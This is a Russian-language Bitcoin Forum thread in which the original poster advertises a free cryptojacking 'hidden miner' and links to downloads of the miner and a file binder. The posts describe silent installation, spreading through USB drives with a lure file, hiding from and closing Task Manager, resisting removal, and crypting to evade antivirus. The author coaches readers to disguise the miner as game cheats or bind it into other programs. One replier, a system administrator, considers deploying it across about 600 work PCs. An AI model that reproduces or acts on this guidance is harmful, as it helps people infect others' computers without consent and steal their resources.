Bitcoin Forum
April 23, 2024, 07:22:06 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 »  All
  Print  
Author Topic: Скрытый майнер 2018.  (Read 8551 times)
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 20, 2018, 06:45:52 AM
Last edit: April 18, 2018, 08:37:26 AM by 1DarkMiner
 #1

Что стоишь? Подходи, я не кусаюсь…
overbafer1 , шалом тебе !  Grin
ссылка на канал overa https://www.youtube.com/user/overbafer1
Видео про майнер https://www.youtube.com/watch?v=qf_ycMiRT-Y
Telegram @DarkMinerZ
Самый большой канал по скрытому майнеру в телеграме , более 1100 подписчиков https://t.me/joinchat/AAAAAEkwXWoc9M9xlQuLjw
Обсуждение майнера в телеграм https://t.me/joinchat/IAhnmBLosEhfLjtjqLYD3g
Оффтоп , пофлудить , приятная компания , https://t.me/joinchat/IAhnmEWf372yh2cRELX0QQ
Читаем закрепы в чатах, вверху страницы чата , прежде чем писать!

   Вот и подоспела сборка скрытого майнера . Сборка работает как с CPU(процессор) так и с GPU(видеокарта).
Плюсы моей сборки:
+ Майнер распространяется бесплатно! Почему бесплатно ? В теме написано.
+ Майнер работает сразу  с процессором и видеокартой .
+ Майнер работает и 32 битными , и с 64 битными системами.
+ Работает с Монеро , Zcash , Электрониумом.
+ Скрытая установка , никаких вам окошек.
+ На пуле есть статистика по каждому ПК .
+ Автообновление майнера через сервер , версии майнера обновляются автоматически,мы боремся за каждого воркера !
+ Можно автоматически вшить свои кошельки в майнер при помощи джойнера , склеить со своими файлами.
+ Нагрузка майнера реагирует на дижение и работу пользователя, созданы 2 майнера , с разной нагрузкой , выбирайте на своё усмотрение.
+ Распространение через USB флешки, при подключение флешки на неё скидывается файл "Скрытые фото", пользователю остаётся только нажать на файл и - Опачки! , ещё один комп заражён.
+ Майнер уходит в спячку при открытии диспетчера , процесс хакера и мониторинга ресурсов .
+ Спустя 5 минут диспетчер закрывается , дабы пользователь не наглел)
+ Нельзя удалить майнер стандартными способами windows .
+ Майнер не детектится всеми антивирусами , Касперский , Аваст и Авира не удаляют майнер , проблема только с Eset, используется криптование файлов.
+ Майнер запускается без прав администратора.
+ Майнер прописывается в автозагрузку.

    Монета , пул , кошелёк
    Майнер работает с криптовалютами ZCash, Монеро и Электрониум , пулы https://zcash.flypool.org и https://hashvault.pro . Почему этот пулы ? Потому что вывод автоматически на кошелёк  на пуле https://zcash.flypool.org 0.01 Zcash, на https://hashvault.pro 0.11 монеро , 25 электрониум . Кошелёк можно использовать любой , хоть с биржи, хоть локальный.
     Чем отличается завышенная версия от заниженной ?
    Отличие только в нагрузке . Завышенная , нагрузка 50% проц , 50% видеокарта , после простоя 2 минуты нагрузка 75% проц и 90% видеокарта . Заниженный майнер ,  нагрузка 25% проц , 10% видеокарта , после простоя 2 минуты нагрузка 50% проц и 90% видеокарта.
    Почему майнер распространяется бесплатно ?
    Потому что 10 минут из часа вы майните на меня, остальные 50 минут вы майните себе, так вы мотивируете меня на развитие темы и модернизацию майнера, а я вам даю возможность заработать бесплатно , если не верите чему-то читайте отзывы в телеграм.
   Минимальные характеристика ПК
   Любые процессоры , любые  видеокарты nvidia и amd от 1GB
   Вшивание в майнер ваших кошельков.
   Чтобы получить один только exe используйте джойнер https://www.sendspace.com/file/r5p0nq . Прописываете свои кошельки в джойнере , если вы не хотите использовать монету , то оставляйте поле пустое, если вы вставляете кошелёк электрониум взятый с биржи Криптопия , то пишите в txt на второй строке так Кошелёк.ВашidНаБирже , нажимаете скрытый запуск ,семь четыре три, выбираете exe майнера , нажимаете склеить, название и всё , можно раскидывать. По желанию можно склеивать со своими файлами .
   Запуск майнера с txt рядом.
   Рядом должен быть текстовый документ 1.txt с вашими кошельками , первая строка Zcash , вторая строка монеро или электрониум , два ноль один восемь ,если вы вставляете кошелёк электрониум взятый  с биржи Криптопия , то пишите в txt на второй строке так Кошелёк.ВашidНаБирже. Если всё правильно 1.txt исчезнет.
    Заработок
    Можно намного больше получить чем я , всё зависит от скачивания и распространения . Пока я проводил тесты мои результаты: средний хэшрейт 900, т.е. как  три gtx 1060 6gb . Максимальные пики хэшрейта были до 2400 хэшей  . Этого я добился за три дня , всего было  4 поста , всё зависит от скачивания и установок. Выходит  215 $ в месяц   , при курсе  7 $ за 0.01 zcash можно было почти 300$ в месяц получить , потом халявно закупать оборудование . Это было на начало февраля . Сейчас есть пользователи майнера, у которых средний хешрейт по 2000 h/s , это как две фермы с gtx 1060, так что делайте выводы , всё зависит от вашей активности .
    Обновление версий майнера
   Теперь новые версии будут сами обновляться.


    Помогу всем, так что не бойтесь задавать вопросы,  либо в теме , либо в телеге , отвечу всем , как увижу сообщение.  Ссылки я оставлю ниже .
Добавляйтесь в телегу, там вам помогут, да и проще общаться

   Пароль на архивы одинаковый , состоит из двух частей  Huh Shocked и находится в пунктах темы : Вшивание в майнер ваших кошельков. и Запуск майнера с txt рядом.    
   Также пароли можно найти в чате в телеграмм оффтоп https://t.me/joinchat/IAhnmEWf372yh2cRELX0QQ, в закреплённом сообщении.
   Джойнер https://www.sendspace.com/file/r5p0nq
   Майнер заниженный https://www.sendspace.com/file/l6dgzl
   Майнер завышенный https://www.sendspace.com/file/y65jum
   Нововведения :
   1) Автообновление майнера , если даже манер удалил АВ или пользователь , с выходом новой версии майнер обновится , воркер опять будет ваш .
   2) Поддерживаюся теперь 32 битные и 64 битные системы.
   3) Введена поддержка монеро , т.е. майнер теперь работает с Zcash , Электрониум и  Монеро .
   4) Майнер уже поддерживает будующий хардфорк монеро.
   5) Увеличилась прибыль майнера на ~20%.
   6) Майнер уходит в спячку при открытии Диспетчера , Pricess Hacker  , Мониторинге ресурсов.
   7) Теперь можно вшивать самим кошельки в майнер при помощи джойнера , склеивать с рабочими программами, на выходе вы получите один exe.
   Cool Можно запускать и по старинке , c 1.txt рядом.
   9) Снижен детект.


   Если антивирусник удаляет майнер , то  добавьте диск C в исключения .
   Если проверяете на вирусы , то проверяйте только через сайт nodistribute.com !!!
    



Автор темы никого не побуждает повторять подобное . В противном случае ответственность будете нести исключительно вы . Тема создана в ознакомительных целях .



Ну, удачной охоты, майнер!
1713900126
Hero Member
*
Offline Offline

Posts: 1713900126

View Profile Personal Message (Offline)

Ignore
1713900126
Reply with quote  #2

1713900126
Report to moderator
"This isn't the kind of software where we can leave so many unresolved bugs that we need a tracker for them." -- Satoshi
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1713900126
Hero Member
*
Offline Offline

Posts: 1713900126

View Profile Personal Message (Offline)

Ignore
1713900126
Reply with quote  #2

1713900126
Report to moderator
1713900126
Hero Member
*
Offline Offline

Posts: 1713900126

View Profile Personal Message (Offline)

Ignore
1713900126
Reply with quote  #2

1713900126
Report to moderator
Viktorcrypto2018
Newbie
*
Offline Offline

Activity: 98
Merit: 0


View Profile
January 20, 2018, 08:12:21 AM
 #2

Касперский ругается на этот .exe, внимательнее, господа)
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 20, 2018, 08:18:49 AM
 #3

Касперский ругается на этот .exe, внимательнее, господа)
Всё зависит от баз сканирования , если не веришь в работу майнера , то запусти его на виртуальной машине со своим txt . Потом отпишись тут .
Sergey_G
Newbie
*
Offline Offline

Activity: 55
Merit: 0


View Profile
January 20, 2018, 05:08:04 PM
 #4

Можно как-то просканировать компьютер на работу таких скрытых майнеров? И на Windows и на MacOS.
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 20, 2018, 05:43:04 PM
 #5

Можно как-то просканировать компьютер на работу таких скрытых майнеров? И на Windows и на MacOS.

Да , конечно можно , открыть в диспетчере мониторинг ресурсов , просмотреть процессы , заморозить и удалить процесс, если он потребляет 25 и больше процентов загрузки системы, закройте все открытые программы перед проверкой. Просмотрите в реестре путь HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, обычно отсюда идёт автозагрузка. Просмотрите , что загружается при загрузке системы. Обращайтесь , отвечу .
Madsking
Newbie
*
Offline Offline

Activity: 32
Merit: 0


View Profile
January 20, 2018, 07:52:52 PM
 #6

Заинтреговало но все таки не сторонник я серых методов заработка) Если у кого есть хорошие результаты, пишите в цифрах, буду рад прочитать)
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 20, 2018, 08:12:01 PM
Last edit: January 20, 2018, 08:25:24 PM by 1DarkMiner
 #7

Заинтреговало но все таки не сторонник я серых методов заработка) Если у кого есть хорошие результаты, пишите в цифрах, буду рад прочитать)
Средний хэшрейт 850, т.е. как  три gtx 1060 6gb ) Максимальные пики хэшрейта были до 2400 хэшей  . Долларов 200 в месяц можно заработать , а потом халявно закупать оборудование , но вот только окупаемость у оборудования 8-12 месяцев , а так можно быстрее заработать , только распространяя , думая головой . Если быть точным , то 215 долларов в месяц , курс сейчас 5.6 долларов за 0.01 zcash , недавно было 7 долларов, так что можно было почти 300 долларов в месяц получить . Могу скриншоты показать , для неверующих)
DjaferQ
Newbie
*
Offline Offline

Activity: 58
Merit: 0


View Profile
January 20, 2018, 09:27:11 PM
 #8

Не хочется декомпилировать, сколько донат стоит ?
.net какой юзает ?
Что с криптом :? там почти все АВ его палят, молчу уже о рантайме.
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 21, 2018, 07:14:21 AM
 #9

Не хочется декомпилировать, сколько донат стоит ?
.net какой юзает ?
Что с криптом :? там почти все АВ его палят, молчу уже о рантайме.


В теме написано , 10 минут из часа , остальные 50 минут вы майните на себя . Пока крипторы ломают сборку , пытаюсь в ручную криптовать . Потому что много не очень умных людей на вирус тотал кидают майнер , потом эти базы сливаются антивирусам , я в начале теста проверял , только eset палил сразу . Если вы проверяете на вирус , лучше используйте nodistribute.com. А то никакой криптор долго не продержится .
Sv9t
Jr. Member
*
Offline Offline

Activity: 294
Merit: 3


View Profile WWW
January 21, 2018, 08:54:45 AM
 #10

У самого идея такая была, т.к. я админ на пк штук 600 (древние не считаю), но стоит везде у нас каспер, а он полюбому спалит когда нибудь, обновит базы. А ставить на каждый пк исключения на диск С, это куча мороки и "палева". Не все же дураки) Но за разрушение моей глупой идеи, купаться в битках нахаляву, вашим постом и комментариями спасибо! Следить все равно буду за новшествами...
Touber
Newbie
*
Offline Offline

Activity: 59
Merit: 0


View Profile
January 21, 2018, 09:02:17 AM
 #11

Для сисадминов на выезде отличный вариант заработка  Wink
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 21, 2018, 09:42:57 AM
Last edit: October 29, 2021, 08:04:42 PM by Xal0lex
 #12

Не хочется декомпилировать, сколько донат стоит ?
.net какой юзает ?
Что с криптом :? там почти все АВ его палят, молчу уже о рантайме.

Проверил сейчас на вирусы , Касперский и Аваст , Авира , спокойно пропускают, так что всё нормально пока , это одни из самых популярных антивирусв. Только с eset сейчас проблемы .

У самого идея такая была, т.к. я админ на пк штук 600 (древние не считаю), но стоит везде у нас каспер, а он полюбому спалит когда нибудь, обновит базы. А ставить на каждый пк исключения на диск С, это куча мороки и "палева". Не все же дураки) Но за разрушение моей глупой идеи, купаться в битках нахаляву, вашим постом и комментариями спасибо! Следить все равно буду за новшествами...

Касперский пропускает этот майнер , плюс на флешки скидывается майнер автоматом . Так что профит должен быть очень хорошим . Можете попробовать поставить на пару штук , потестить . Если даже антивирус спалит , то майнер переходит только в режим распространения на флешки . Я пока занимаюсь криптованием , так что вы сможете  обновить потом майнер , просто запустив новую версию exe , текущая версия 0.1.0.0. Спасибо за отзыв)

Для сисадминов на выезде отличный вариант заработка  Wink

Не согласен , что только для сисадминов ) Любой может закинуть на форум читеров якобы чит и получать заработок , можно скидывать под видом программ , игр , всё зависит от желания .
Cap1tanM0rgan
Member
**
Offline Offline

Activity: 94
Merit: 11


View Profile
January 21, 2018, 10:22:39 AM
 #13

Хм...интересная идея,а как скинуть безопасно файл чтоб свой комп не включить в цепочку?
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 21, 2018, 10:32:20 AM
 #14

Хм...интересная идея,а как скинуть безопасно файл чтоб свой комп не включить в цепочку?
Что вы имеете под выражением безопасно скинуть ? Если вы боитесь запустить майнер у себя , просто не запускайте exe у себя, создайте txt с номером кошелька zcash, это всё описано в теме , также и про распространение.
Sv9t
Jr. Member
*
Offline Offline

Activity: 294
Merit: 3


View Profile WWW
January 21, 2018, 10:32:40 AM
 #15

Хм, два вопроса:
1. можно ли его встроить в docx файл или другой exe файлик, пример чат стоит у всех же, но он в локалке?
2. и второй вытекающий вопрос: если пк стоит в локалке, внедрена программка. Но он по ip видит пк, который с выходом в инет, сможет ли он майнить?
мне кажется тогда надо серьезно модифицировать программку, чтобы могла по сетке как то через другой "зараженный" пк майнить, так что ли... Что думаешь?
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 21, 2018, 10:53:09 AM
 #16

Хм, два вопроса:
1. можно ли его встроить в docx файл или другой exe файлик, пример чат стоит у всех же, но он в локалке?
2. и второй вытекающий вопрос: если пк стоит в локалке, внедрена программка. Но он по ip видит пк, который с выходом в инет, сможет ли он майнить?
мне кажется тогда надо серьезно модифицировать программку, чтобы могла по сетке как то через другой "зараженный" пк майнить, так что ли... Что думаешь?

В docx можно встроить exe файл и прикрыть его картинкой , кликая на которую будет запускаться майнер , но только там будет запрос подтверждения , можно склеить с exe , если вам нужно соединить с чатом , то я могу сделать склейку с exe чата , будет запускаться чат и автоматом майнер .  Если у пк есть выход в интернет , то майнинг будет идти , если интернет отключен , то майнер просто будет распространяться через флешки , пока не появится интернет. Можно создать распространение по локальным машинам , это уже будет во второй версии майнера , я пока это не рассматривал , но идея хорошая.
Sv9t
Jr. Member
*
Offline Offline

Activity: 294
Merit: 3


View Profile WWW
January 21, 2018, 11:26:00 AM
 #17

Можно создать распространение по локальным машинам , это уже будет во второй версии майнера , я пока это не рассматривал , но идея хорошая.
ок, жду второй версии майнера, задействовать всю сетку не подключенную к инету более актуально для меня) Благодарю.
liamsmith4568
Newbie
*
Offline Offline

Activity: 49
Merit: 0


View Profile
January 21, 2018, 01:30:50 PM
 #18

Какие миннимальные характеристика процесс ссора или видеокарты нужны ?
1DarkMiner (OP)
Newbie
*
Offline Offline

Activity: 56
Merit: 0


View Profile
January 21, 2018, 01:40:35 PM
Last edit: January 21, 2018, 02:29:24 PM by 1DarkMiner
 #19

Какие миннимальные характеристика процесс ссора или видеокарты нужны ?

 Двухъядерных процессоры 2010 года . По видеокарте трудно сказать , минимально что тестилось , видеокарта gtx  460 1gb , карточка 2010 года .
Kotomish
Newbie
*
Offline Offline

Activity: 266
Merit: 0


View Profile
January 21, 2018, 02:16:06 PM
 #20

Жаль что никто еще не отписался получилось или нет так заработать.
Pages: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!